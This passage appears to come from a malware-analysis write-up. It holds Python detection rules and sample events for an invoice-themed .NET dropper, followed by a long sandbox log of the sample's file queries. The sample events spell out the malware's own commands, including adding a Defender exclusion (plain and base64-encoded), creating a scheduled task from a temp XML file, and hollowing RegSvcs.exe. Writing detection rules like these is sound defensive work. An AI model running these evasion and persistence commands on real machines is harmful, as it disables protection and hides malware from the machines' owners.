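def rule_hollow_host(ev):
    """A .NET host binary started with no arguments by a parent in a user-writable path (T1055.012)."""
    image = _lc(ev.get("image"))
    name = image.rsplit("\\", 1)[-1]
    cl = _lc(ev.get("command_line")).strip().strip('"')
    parent = _lc(ev.get("parent_image"))
    return (ev.get("type") == "process_create"
            and name in HOLLOW_HOSTS
            and cl == image                      # the command line is nothing but the image path
            and any(d in parent for d in USER_WRITABLE))


def rule_pe_written_to_foreign_process(ev):
    """Another process writes a buffer starting with the MZ header (4D5A) into this image."""
    return (ev.get("type") == "memory_write"
            and _lc(ev.get("source")) != _lc(ev.get("target"))
            and _lc(ev.get("first_bytes")).startswith("4d5a"))


RULES = {
    "defender_exclusion_added": rule_defender_exclusion,
    "scheduled_task_from_temp_xml": rule_task_from_temp,
    "dotnet_host_launched_for_hollowing": rule_hollow_host,
    "pe_written_to_foreign_process": rule_pe_written_to_foreign_process,
}


def detect(events):
    """Return [(rule_name, event_index), ...] for every rule that fires on every event."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


SAMPLE_EVENTS = [  # constructed from the process tree shown above, plus one benign control
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\user\Desktop\Total Invoices.exe",
     "command_line": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"'},
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "parent_image": r"C:\Users\user\Desktop\Total Invoices.exe",
     "command_line": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"'},
    {"type": "process_create", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "parent_image": r"C:\Users\user\AppData\Roaming\dWXyZYb.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"type": "memory_write", "source": r"C:\Users\user\Desktop\Total Invoices.exe",
     "target": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "base": 0x400000, "first_bytes": "4D5A"},
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\user\Desktop\Total Invoices.exe",   # same cmdlet, base64-encoded (constructed)
     "command_line": "powershell.exe -NoP -enc " + encode_powershell_command(r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"')},
    {"type": "process_create", "image": r"C:\Windows\System32\schtasks.exe",   # benign: a query, not a /Create
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks /Query /TN "Updates\dWXyZYb"'},
]

if __name__ == "__main__":
    for rule_name, index in detect(SAMPLE_EVENTS):
        print(f"{rule_name}: event {index}")
```

The hollowing rule deliberately needs three conditions together (known host binary, bare image path as the command line, parent outside the Windows directories) because RegSvcs.exe started by an installer with arguments is routine; the MZ-write rule is the stronger signal and needs memory-write telemetry that plain process auditing does not provide.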
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Users\user\Desktop\Total Invoices.exe VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Total Invoices.exe -- Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
